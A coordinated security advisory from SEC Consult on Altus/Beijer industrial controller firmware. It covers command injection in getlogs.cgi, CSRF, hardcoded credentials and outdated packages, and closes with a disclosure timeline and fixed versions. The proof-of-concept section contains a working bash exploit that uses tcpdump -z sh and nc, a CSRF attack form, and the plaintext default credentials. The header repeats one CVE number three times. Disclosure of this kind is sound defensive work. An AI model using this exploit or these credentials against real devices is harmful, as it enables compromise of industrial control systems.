SEC Consult Vulnerability Lab Security Advisory < 20210819-0 >
=======================================================================
title: Multiple Critical Vulnerabilities
product: Multiple Altus Sistemas de Automacao products:
Nexto NX30xx Series
Nexto NX5xxx Series
Nexto Xpress XP3xx Series
Hadron Xtorm HX3040 Series
vulnerable version: See "Vulnerable / tested versions"
fixed version: See "Solution"
CVE number: CVE-2021-39243, CVE-2021-39243, CVE-2021-39243
impact: Critical
homepage: https://www.altus.com.br/
found: 2020-05-20
by: D. Teuchert
T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"As a reference for the automation market for more than 35 years, Altus
Sistemas de Automação S.A. offers a complete line of products that meet a wide
range of customers’ needs in several areas of the domestic and international
markets. Developed with own technology, our solutions deliver high added value
to our customers businesses, enabling productivity, safety and reliability for
industrial automation applications and industrial automation processes.
We are a member of Parit Participações, a holding company in the technology
sector, which also controls Teikon S.A., a company with operations on the
electronic manufacturing market, and RT Tecnologia Médica, a company that
operates in the radiological market."
Source: https://www.altus.com.br/sobre
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult recommends to perform a thorough security review of these
products conducted by security professionals to identify and resolve all
security issues.
Vulnerability overview/description:
-----------------------------------
1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244)
The getlogs.cgi script allows authenticated users to start tcpdump on the
device. By injecting payloads into specific parameters it is also possible to
execute arbitrary OS commands. The output of these commands can be obtained in
another step.
2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243)
The web interface that is used to set all configurations is vulnerable to
cross-site request forgery attacks. An attacker can change settings this way by
luring the victim to a malicious website.
3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245)
The getlogs.cgi script is exclusively htaccess-protected with hardcoded
credentials. These are shared with all firmware images from the series NX30xx,
HX30xx and XP3xx. These hardcoded credentials can be used to access the device
without a valid user account on application level and cannot be changed in the
user interface.
In combination with vulnerability 1), a full compromization on system level
with the only precondition of network access can be done.
4) Outdated and Vulnerable Software Components
A static scan with the IoT Inspector revealed outdated software packages that
are used in the devices' firmware.
The used BusyBox toolkit is outdated and contains multiple known
vulnerabilities. The outdated version was found by IoT Inspector. One of the
discovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA
scalable firmware runtime.
Proof of concept:
-----------------
1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244)
The following firmware extract of getlogs.cgi displays the vulnerability:
-------------------------------------------------------------------------------
TCPDUMP_IFACE=`echo "$QUERY_STRING" | sed -n 's/^.*tcpdump_iface=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
TCPDUMP_COUNT=`echo "$QUERY_STRING" | sed -n 's/^.*tcpdump_count=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
[...]
echo "tcpdump is running ..."
echo "<p>Please, wait the capture of $TCPDUMP_COUNT packets in $TCPDUMP_IFACE.</p>"
chrt -p -f 70 $$
tcpdump -i $TCPDUMP_IFACE -c $TCPDUMP_COUNT -w /tmp/capture.pcap
mount / -o rw,remount
ln -s /tmp/capture.pcap /usr/www/capture.pcap
mount / -o ro,remount
echo "<a href=\"capture.pcap\" download=\"$TCPDUMP_IFACE-capture.pcap\">Click here to download the capture file</a>"
-------------------------------------------------------------------------------
As it can be seen, the variables $TCPDUMP_COUNT and $TCPDUMP_IFACE are used
unfiltered in the tcpdump command. This means, that it is possible to inject
arbitrary parameters to the tcpdump command. The flag -z for tcpdump allows to
define a program that will run on the capture file. This behaviour can be used
to execute arbitrary commands. The following request injects parameters, so
that tcpdump listens on UDP port 1234 and will execute the capture file with
sh:
-------------------------------------------------------------------------------
GET /getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%201234 HTTP/1.1
Host: $IP
Authorization: Basic YWx0dXM6bmV4dG8xMjM0
-------------------------------------------------------------------------------
The next step to exploit this vulnerability is to send the commands to UDP port
1234:
$ echo -e ";\n$CMD &>/tmp/capture.pcap;\n'\n$CMD &>/tmp/capture.pcap;" | nc -u $TARGET_HOST $UDP_PORT
The command is sent twice because it is possible, that the capture file
contains a "'" before the sent payload. Injecting the commands twice with a "'"
in between makes sure, that the command will be executed by sh and not
interpreted as a string. The output of the executed command is redirected to
the file capture.pcap which can be accessed via the following request:
-------------------------------------------------------------------------------
GET /capture.pcap HTTP/1.1
Host: $IP
-------------------------------------------------------------------------------
These three steps are combined in the following proof of concept script:
-------------------------------------------------------------------------------
#!/bin/bash
#Author: D. Teuchert
CMD="whoami"
if [[ $# -eq 1 ]]; then
CMD=$1
fi
TARGET_HOST="192.168.100.123"
UDP_PORT=1234
BASIC_AUTH_USERNAME="altus"
BASIC_AUTH_PASSWORD="nexto1234"
BASIC_AUTH_HEADER=$(printf "$BASIC_AUTH_USERNAME:$BASIC_AUTH_PASSWORD" | base64)
#Sending HTTP request with parameter injection in tcpdump
#Break out of tcpdump is done via a technique described here:
#https://insinuator.net/2019/07/how-to-break-out-of-restricted-shells-with-tcpdump/
curl -s -k -X "GET" -H "Host: $TARGET_HOST" -H "Authorization: Basic $BASIC_AUTH_HEADER" "http://$TARGET_HOST/getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%20$UDP_PORT">/dev/null &
#Send udp packet with payload
echo -e ";\n$CMD &>/tmp/capture.pcap;\n'\n$CMD &>/tmp/capture.pcap;" | nc -u $TARGET_HOST $UDP_PORT
echo -e "Executed \"$CMD\".\nResponse:"
#The output of the executed command was saved in capture.pcap
curl -s -k -X "GET" -H "Host: $TARGET_HOST" "http://$TARGET_HOST/capture.pcap"
-------------------------------------------------------------------------------
2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243)
The following CSRF proof-of-concept can be used to do the first step of the
command Injection exploitation:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/getlogs.cgi">
<input type="hidden" name="logtype" value="tcpdump" />
<input type="hidden" name="tcpdump_iface" value="eth0" />
<input type="hidden" name="tcpdump_count" value="1 -G 1 -z sh -U -A udp port 1234" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245)
The hardcoded credentials are present under "/etc/lighttpd/lighttpd-auth.conf":
altus:nexto1234
These credentials are exclusively used for the getlogs.cgi script. This is also
described in the lighttpd.conf which is located under the same directory:
-------------------------------------------------------------------------------
[...]
auth.debug = 0
auth.backend = "plain"
auth.backend.plain.userfile = "/etc/lighttpd/lighttpd-auth.conf"
auth.require = ( "/cgi/getlogs.cgi" =>
(
"method" => "basic",
"realm" => "Password protected area",
"require" => "user=altus"
)
)
[...]
-------------------------------------------------------------------------------
4) Outdated and Vulnerable Software Components
Based on an automated scan with the IoT Inspector the following third party
software packages were found to be outdated:
Altus/Beijer XP3xx:
BusyBox 1.19.4
GNU glibc 2.19
lighttpd 1.4.30
Linux Kernel 4.9.98
OpenSSH 5.9p1
OpenSSL 1.0.0g
OpenSSL 1.1.1b (in CODESYS)
CODESYS Control 3.5.15
Altus/Beijer NX30xx:
BusyBox 1.1.3
Dropbear SSH 0.45
GNU glibc 2.5
lighttpd 1.4.24-devel-v1.0.0.7-1727-g6fd3998
Linux Kernel 2.6.23
OpenSSL 0.9.8g
OpenSSL 1.1.1b (in CODESYS)
CODESYS Control 3.5.15
Altus/Beijer HX30xx:
BusyBox 1.19.4
GNU glibc 2.11.1
lighttpd 1.4.30
Linux Kernel 3.0.75
OpenSSH 5.9p1
OpenSSL 1.0.0g
OpenSSL 1.0.2j (in CODESYS)
CODESYS Control 3.5.12.65
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device:
A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
55\;test.txt
#
-------------------------------------------------------------------------------
The vulnerabilities 1), 2), 3), 4) were manually verified on an emulated device
by using the MEDUSA scalable firmware runtime.
Vulnerable / tested versions:
-----------------------------
The following firmware versions have been found to be vulnerable:
Altus/Beijer Nexto NX3003 / 1.8.11.0
Altus/Beijer Nexto NX3004 / 1.8.11.0
Altus/Beijer Nexto NX3005 / 1.8.11.0
Altus/Beijer Nexto NX3010 / 1.8.3.0
Altus/Beijer Nexto NX3020 / 1.8.3.0
Altus/Beijer Nexto NX3030 / 1.8.3.0
Altus/Beijer Nexto Xpress XP300 / 1.8.11.0
Altus/Beijer Nexto Xpress XP315 / 1.8.11.0
Altus/Beijer Nexto Xpress XP325 / 1.8.11.0
Altus/Beijer Nexto Xpress XP340 / 1.8.11.0
Altus/Beijer Hadron Xtorm HX3040 / 1.7.58.0
The following versions are also vulnerable according to the vendor:
Altus/Beijer Nexto NX5100 / 1.8.11.0
Altus/Beijer Nexto NX5101 / 1.8.11.0
Altus/Beijer Nexto NX5110 / 1.1.2.8
Altus/Beijer Nexto NX5210 / 1.1.2.8
Vendor contact timeline:
------------------------
2020-05-25: Contacting VDE CERT through info@cert.vde.com. Received
confirmation from VDE CERT.
2020-05-01 - 2020-09-01: Multiple emails and telephone calls with VDE CERT.
VDE CERT contacts said, that the vendor did not respond on any
messages or calls.
2020-09-30: Wrote a message to the SVP R&D and Supply Chain of Beijer
Electronics. No answer.
2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated
that no case regarding vulnerabilities were opened and created one.
The product owners of Westermo, Korenix and Beijer Electronics were
informed via this inquiry. Set disclosure date to 2020-11-25.
2020-10-06: Restarted the whole responsible disclosure process by sending a
request to the new security contact cs@beijerelectronics.com.
2020-11-11: Asked the representatives of Korenix and Beijer regarding the
status. No answer.
2020-11-25: Phone call with security manager of Beijer. Sent advisories via
encrypted archive to cs@beijerelectronics.com. Received
confirmation of advisory receipt. Security manager told us that he
can provide information regarding the time-line for the patches
within the next two weeks.
2020-12-09: Asked for an update.
2020-12-18: Call with security manager of Beijer. Vendor presented initial
analysis done by the affected companies, also Altus. Preliminary
plans to fix the vulnerabilities were presented. Altus stated to
fix issue #1 in January and the other vulnerabilities in March or
April.
2021-03-21: Security manager invited SEC Consult to have a status meeting.
2021-03-25: Altus fixed vulnerability #1. Handover of the advisory handling to
Altus employees will be done in April. Vendor released fixed
firmware regarding issue #1.
2021-04-09: Meeting with Altus. Vendor did not agree with another potentially
vulnerability, which was identified on the emulated device. Thus,
it was removed from the advisory. Vulnerabilities #2 and #3 were
planned to be fixed earlier this year but the releases shifted due
to Covid. The new firmware version will be released in July 2021.
2021-04-22: Asked for an update; No answer.
2021-05-04: Asked for an update.
2021-05-07: Vendor was working on the security fixes.
2021-05-11: Vendor sent timeline for fixes and detailed version information.
Two additional models were added to the affected devices by the
vendor.
2021-06-10: Added additional information and asked if more time will be needed.
2021-06-10: Vendor added affected version numbers and asked for the 1st of
August as new release date.
2021-06-15: Set the release date to 1st of August.
2021-07-28: Vendor sent the version numbers for the fixed firmware and asked
for postponing the release to 6th of August for completing the
documentation.
2021-08-16: Due to holiday, the SEC Consult Vulnerability was closed. Informed
vendor to release the advisory in the next four days.
2021-08-17: Received CVE IDs.
2021-08-18: Informed vendor to release the advisory on 2021-08-19.
2021-08-19: Coordinated release of security advisory.
Solution:
---------
According to the vendor the following patches must be applied to fix issue 1),
2) and 3):
XP300 - v1.11.2.0
XP315 - v1.11.2.0
XP325 - v1.11.2.0
XP340 - v1.11.2.0
BCS-NX3003 - v1.11.2.0
BCS-NX3004 - v1.11.2.0
BCS-NX3005 - v1.11.2.0
BCS-NX3010 - v1.9.1.0
BCS-NX3020 - v1.9.1.0
BCS-NX3030 - v1.9.1.0
BCS-NX5100 - v1.11.2.0
BCS-NX5101 - v1.11.2.0
BCS-NX5110 - v1.11.2.0
BCS-NX5210 - v1.11.2.0
BCS-HX3040 - v1.11.2.0
Vendor's statement regarding issue 4):
"Altus continuously integrates new features and fixes in the products,
releasing new firmware versions. Often those improvements require the software
packages upgrading for several reasons, including security. When this happens,
we perform a set of tests to ensure that the performance, reliability, and
security were not negatively impacted by the upgrades. Although there are known
vulnerabilities in some software package versions, those vulnerabilities can
only be exploited if we compile those specific features and provide the means
to exploit them. The issue pointed out by SEC Consult, for instance, requires a
terminal to be exploited, which we don't provide in real hardware. Nowadays,
there isn't any known exploitable vulnerability caused by outdated software
packages in our products. Therefore, this item isn’t considered a vulnerability
by us."
Workaround:
-----------
Restrict network access to the device.
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Daniel Teuchert, Thomas Weber / @2021